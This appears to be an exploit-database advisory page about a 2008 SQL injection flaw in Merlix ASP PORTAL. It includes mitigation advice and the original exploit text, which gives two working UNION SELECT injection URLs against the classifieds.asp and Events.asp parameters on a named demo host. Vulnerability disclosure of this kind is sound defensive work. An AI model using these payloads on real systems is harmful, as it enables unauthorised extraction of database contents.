Merlix ASP PORTAL SQL Injection Vulnerability

vendor:

ASP PORTAL

by:

OffensiveTrack

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: ASP PORTAL

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2008

Merlix ASP PORTAL SQL Injection Vulnerability

The Merlix ASP PORTAL is vulnerable to SQL Injection. The vulnerability allows an attacker to inject malicious SQL queries through the 'ItemID' and 'ID' parameters in the 'classifieds.asp' and 'Events.asp' scripts respectively. By exploiting this vulnerability, an attacker can manipulate the SQL queries and retrieve sensitive information from the database.

Mitigation:

The vendor should sanitize user input before using it in SQL queries to prevent SQL Injection attacks. Additionally, input validation and parameterized queries can also help mitigate this vulnerability.

Source

Exploit-DB raw data:

###########################################################################
#---------------------------------------------------OffensiveTrack--------------------------------------------------------#
###########################################################################

---------------------------- Tunisian Muslim ------------------------------

#found by : OffensiveTrack
#Author   : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Merlix ASP PORTAL
#download : null
#Demo     : http://demo.merlix.com/portal/


#Exploit :
--=[SQL INJECTION]=--
http://demo.merlix.com/portal/classifieds.asp?ItemID=-0+union+select+1,2,3,4,5,6,7,8,9,10+from+Directory
http://demo.merlix.com/portal/Events.asp?ID=-0+union+select+1,2,3,4,5,6,7,8+from+Directory



#Greetz For Synex

###########################################################################

# milw0rm.com [2008-12-05]